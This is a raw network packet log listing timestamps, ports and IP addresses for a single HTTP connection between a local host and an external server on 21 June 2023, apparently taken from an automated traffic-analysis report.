Jun 21, 2023 04:27:58.109011889 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.109047890 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.109059095 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.109071016 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.109110117 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.109157085 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.109174967 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.109203100 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.109250069 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.109256029 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.109297991 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.109343052 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.109386921 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.109391928 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.109435081 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.109487057 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.109498024 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.109560966 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.109606981 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.109611988 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.109653950 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.109654903 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.109700918 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.109745979 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.109750986 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.109792948 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.109843016 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.109844923 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.109910965 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.109978914 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.110030890 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.110057116 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.110074997 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.110093117 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.110121012 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.110166073 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.110210896 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.110236883 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.110256910 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.110272884 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.110305071 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.110349894 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.110373020 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.110395908 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.110439062 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.110456944 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.110485077 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.110533953 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.110584974 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.110598087 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.110651970 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.110670090 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.110697031 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.110740900 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.110769987 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.110784054 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.110827923 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.110833883 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.110871077 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.110913038 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.110930920 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.110977888 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.111046076 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.111112118 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.111120939 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.111179113 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.111227989 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.111231089 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.111274958 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.111318111 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.111334085 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.111361027 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.111402988 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.111412048 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.111447096 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.111447096 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.111490965 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.111541033 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.111541033 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.111588955 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.111633062 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.111637115 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.111694098 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.111740112 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.111746073 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.111784935 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.111830950 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.111876011 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.111876011 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.111921072 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.111965895 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.111967087 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.112010002 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.112015009 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.112061024 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.112107992 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.112133026 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.112153053 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.112199068 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.112245083 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.112299919 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.112320900 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.112370014 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.112394094 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.112421989 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.112426996 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.112468958 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.112518072 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.112519026 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.112565994 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.112611055 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.112615108 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.112657070 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.112701893 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.112749100 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.112749100 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.112796068 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.112840891 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.112854004 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.112885952 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.112886906 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.112934113 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.112978935 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.112984896 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.113024950 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.113068104 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.113071918 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.113135099 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.113179922 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.113224030 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.113239050 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.114561081 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.135447025 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.137774944 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.138566017 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.138626099 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.138673067 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.138710022 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.138719082 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.138782024 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.138849974 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.138876915 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.138901949 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.138922930 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.138950109 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.138994932 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.139030933 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.139039993 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.139085054 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.139096022 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.139132023 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.139178038 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.139220953 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.139223099 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.139267921 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.139277935 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.139312983 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.139358044 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.139370918 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.139403105 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.139447927 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.139461994 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.139493942 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.139545918 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.139590025 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.139611959 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.139635086 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.139678955 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.139702082 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.139724970 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.139739037 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.139771938 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.139816999 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.139828920 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.139863968 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.139909983 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.139919996 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.139955044 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.140001059 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.140045881 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.140055895 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.140091896 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.140136957 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.140150070 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.140183926 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.140228987 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.140244007 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.140305042 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.140306950 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.140355110 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.140398979 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.140444040 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.140477896 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.140489101 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.140497923 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.140539885 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.140584946 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.140605927 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.140630960 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.140676022 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.140693903 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.140721083 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.140764952 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.140809059 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.140827894 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.140853882 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.140898943 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.140913010 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.140945911 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.140989065 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.141005039 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.141035080 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.141078949 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.141092062 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.141123056 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.141134977 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.141169071 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.141213894 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.141227007 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.141258955 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.141304970 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.141325951 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.141351938 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.141396999 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.141441107 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.141453028 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.141490936 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.141539097 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.141551018 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.141583920 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.141629934 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.141640902 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.141675949 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.141721010 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.141740084 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.141765118 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.141773939 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.141810894 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.141860962 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.141890049 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.141928911 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.141978025 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.141987085 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.142024994 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.142070055 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.142113924 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.142126083 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.142159939 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.142205000 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.142220020 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.142251015 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.142261982 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.142301083 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.142344952 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.142358065 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.142390966 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.142436028 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.142461061 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.142482042 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.142530918 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.142540932 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.142575979 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.142621040 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.142637968 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.142666101 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.142710924 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.142755032 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.142776966 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.142801046 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.142844915 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.142862082 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.142889977 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.142923117 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.142935991 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.144567966 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.166074038 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.168591976 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.168656111 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.168703079 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.168746948 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.168771029 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.168791056 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.168806076 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.168837070 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.168880939 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.168919086 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.168926954 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.168971062 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.169014931 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.169024944 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.169060946 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.169105053 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.169114113 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.169150114 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.169158936 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.169194937 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.169236898 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.169249058 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.169281960 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.169325113 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.169336081 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.169378996 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.169409990 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.169445992 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.169471979 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.169493914 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.169545889 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.169593096 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.169608116 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.169640064 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.169687033 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.169693947 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.169734001 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.169740915 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.169779062 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.169823885 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.169830084 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.169869900 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.169915915 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.169924021 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.169961929 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.170006990 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.170053005 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.170059919 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.170099974 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.170144081 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.170156002 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.170190096 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.170196056 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.170238972 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.170284033 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.170305014 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.170331001 CEST	80	49719	45.9.74.80	192.168.2.3
